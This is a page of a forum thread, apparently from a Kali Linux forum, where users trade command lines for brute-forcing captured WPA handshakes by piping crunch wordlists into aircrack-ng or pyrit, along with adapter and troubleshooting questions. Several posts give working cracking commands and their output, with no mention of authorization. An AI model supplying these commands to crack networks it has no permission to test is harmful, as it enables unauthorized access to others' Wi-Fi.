Page 2 of 2 FirstFirst 12
Results 51 to 62 of 62

Thread: Cracking WPA key with crunch | aircrack (almost fullproof but how speed things up)

  1. #51
    Join Date
    2015-Nov
    Posts
    1
    hi guys
    1. forgive me for bad english
    2.i search internet but i can't find my answer
    3.my question is :
    i have 3 pc's and laptop
    in my laptop i run "pyrit server "
    and on other computer config file "~/pyrit/config" and everything work fine
    when i try in client "pyrit benchmark " , in server shows "serving 1 active client" or " serving 2 active client"
    NOW when i run this command in server
    crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    THEN what command in client must be to help the server

  2. #52
    Join Date
    2015-Nov
    Posts
    9
    do you guys know if the USB Wireless Adapter,
    TP-LINK TL-WN722N

    is compatible with Kali and aircrack? I thought I read it was, that is why I bought it, but no Linux drivers are for download on the companies website, so now I am not so sure?

    Thanks

  3. #53
    Join Date
    2015-Dec
    Posts
    1
    Quote Originally Posted by thrgk View Post
    do you guys know if the USB Wireless Adapter,
    TP-LINK TL-WN722N

    is compatible with Kali and aircrack? I thought I read it was, that is why I bought it, but no Linux drivers are for download on the companies website, so now I am not so sure?

    Thanks
    Yes.I have WN7200ND and it work fine with Kali.but seems like it have problem on "wash".if kali not recognize ur USB Try update and Upgrade it.

  4. #54
    Join Date
    2015-Nov
    Posts
    9
    Quote Originally Posted by Kareivis View Post
    Yes.I have WN7200ND and it work fine with Kali.but seems like it have problem on "wash".if kali not recognize ur USB Try update and Upgrade it.

    How did you go about installing the drivers on your laptop without internet? I dont have internet on Kali, so was hoping I could download the drivers and save them to a usb somehow then install them via kali.

    BTW, only windows drivers are on the products website?

  5. #55
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by thrgk View Post
    do you guys know if the USB Wireless Adapter,
    TP-LINK TL-WN722N

    is compatible with Kali and aircrack? I thought I read it was, that is why I bought it, but no Linux drivers are for download on the companies website, so now I am not so sure?

    Thanks
    Yes, I have the same wifi adapt for close to a year now and just plug it in and go hunting.

  6. #56
    Join Date
    2015-Dec
    Posts
    1
    Yes, I'm checking this method and I don't see way to find the pass in a reasonable time.

  7. #57
    Join Date
    2016-Jan
    Posts
    2
    Hey!!

    I am having problems cracking a password with the method mentioned in this thread.
    When I run crunch with aircrack it doesnt do anything.
    This is what happens:

    root@KTest:~# crunch 0 25 abcdefghiklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY Z | aircrack-ng -w - --bssid 0C:F8:93:46:B3:40 -w testfile*.cap
    Crunch will now generate the following amount of data: 400214617560680051 bytes
    381674401817 MB
    372728908 GB
    363993 TB
    355 PB
    Crunch will now generate the following number of lines: 6192586887512427924
    Opening testfile-02.cap
    Opening testfile-03.cap
    Opening testfile-04.cap
    Opening testfile-05.cap
    Opening testfile-06.cap
    Opening testfile-07.cap
    Reading packets, please wait...

    Aircrack-ng 1.2 rc2
    Passphrase not in dictionary

    0






















    Quitting aircrack-ng...
    root@KTest:~#


    Any ideas?

  8. #58
    Join Date
    2014-Jan
    Posts
    1
    Something wrong with your command, try this command instead:
    crunch 8 10 -f /usr/share/crunch/charset.lst mixalpha-numeric-space | aircrack-ng -w - -a 2 -b bssid testfile*.cap

    WPA key min length 8 chars, majority of router uses default 10 chars, some uses 13 chars.
    You may try crunch 8 13, but not practical to crack WPA more then that using cpu crack, e.g. aircrack-ng.

    You can always refer to the manual if in doubt or uncertain of some commands. Example: man crunch, man aircrack-ng

  9. #59
    Join Date
    2013-Mar
    Posts
    27
    Hi was wondering if there could be some possibility of using this same process but instead of aircrack/pyrit we would use hashcat?
    Does anyone know how the terminal statement would have to said ? If anyone does, please do if they could reply with it,
    Im only saying this cause I've head that hashcat is faster than aircrack / pyrit.

  10. #60
    Join Date
    2016-Feb
    Posts
    1
    Quote Originally Posted by hausoo View Post
    yes depends on your video card (cuda_cores)

    crack 12 digit unknown passwd

    crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ1234567890 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    crunch+aircrack-ng cpu-only

    HTML Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - -b xx:xx:xx:xx:xx:xx capture-03.cap
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Opening capture-03.cap
    Reading packets, please wait...
    
    
    
                                     Aircrack-ng 1.2 beta1
    
    
                       [00:00:45] 180855 keys tested (4367.42 k/s)
    crunch+pyrit cpu+GPU (cuda 334 cores)
    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r capture-03.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'capture-03.cap' (1/1)...
    Parsed 47 packets (47 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaaaaajKUl0 23400 PMKs per second.
    Hello,sorry if made a wry message. I write through the translator. after you enter the command with 'Purit' , it gives me a list of his commands. help how to fix it?

  11. #61
    Join Date
    2016-Feb
    Posts
    1
    Thank's Zimmaro

  12. #62
    Join Date
    2016-Mar
    Posts
    1
    If you are serious about using crunch and the code supplied within this thread, make sure you know how to use it properly.
    You could very well make your hdd fail by using crunch incorrectly.

Similar Threads

  1. Aircrack (+) airolib speed
    By YoloSolo in forum General Archive
    Replies: 7
    Last Post: 2018-02-10, 18:23
  2. Aircrack Speed
    By Name Taken in forum NetHunter General Questions
    Replies: 0
    Last Post: 2016-01-23, 04:35

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •